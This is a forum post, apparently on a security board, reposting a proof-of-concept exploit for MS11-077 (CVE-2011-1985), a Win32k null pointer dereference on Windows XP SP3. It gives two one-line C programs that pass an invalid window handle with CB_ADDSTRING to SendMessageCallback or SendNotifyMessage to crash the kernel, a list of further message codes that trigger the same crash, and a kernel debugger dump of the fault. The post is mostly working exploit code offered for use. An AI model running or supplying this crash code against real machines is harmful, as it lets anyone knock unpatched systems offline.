Jump to content
Nytro

MS11-077 Win32k Null Pointer De-reference Vulnerability POC

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

MS11-077 Win32k Null Pointer De-reference Vulnerability POC

# Exploit Code. Only a single line of code can cause BSOD

# Exploit Title: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
# Date: 10/19/2011
# Author: KiDebug
# Version: Windows XP SP3 32bit
# Tested on: Windows XP SP3 32bit
# CVE : CVE-2011-1985

# Exploit Code. Only a single line of code can cause BSOD:

#include <Windows.h>

void main()
{
 SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0);
}

or:

#include <Windows.h>

void main()
{
 SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0);
}

Those messages can aslo cause BSOD:

// CB_ADDSTRING             0x0143
// CB_INSERTSTRING          0x014A
// CB_FINDSTRING            0x014C
// CB_SELECTSTRING          0x014D
// CB_FINDSTRINGEXACT       0x0158
// LB_ADDSTRING             0x0180
// LB_INSERTSTRING          0x0181
// LB_SELECTSTRING          0x018C
// LB_FINDSTRING            0x018F
// LB_FINDSTRINGEXACT       0x01A2
// LB_INSERTSTRINGUPPER     0x01AA
// LB_INSERTSTRINGLOWER     0x01AB
// LB_ADDSTRINGUPPER        0x01AC
// LB_ADDSTRINGLOWER        0x01AD


0: kd> r
eax=0000001b ebx=ee0af1fa ecx=ffffffff edx=bbdd0650 esi=ffffffff edi=ee21fd64
eip=bf914e9b esp=ee21fd08 ebp=ee21fd08 iopl=0         nv up ei pl nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
win32k!NtUserfnINCBOXSTRING+0x8:
bf914e9b 8b4120          mov     eax,dword ptr [ecx+20h] ds:0023:0000001f=????????

0: kd> kp
ChildEBP RetAddr
ee21fd08 bf80ef2b win32k!NtUserfnINCBOXSTRING+0x8
ee21fd40 8054261c win32k!NtUserMessageCall+0xae
ee21fd40 7c92e4f4 nt!KiFastCallEntry+0xfc
0012ff2c 77d194be ntdll!KiFastSystemCallRet
0012ff5c 00401015 USER32!NtUserMessageCall+0xc
0012ff78 0040114c 1!main(void)+0x15 [[r:\temp\1\1.cpp @ 6]
0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278]
0012fff0 00000000 kernel32!BaseProcessStart+0x23

Sursa: MS11-077 Win32k Null Pointer De-reference Vulnerability POC

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...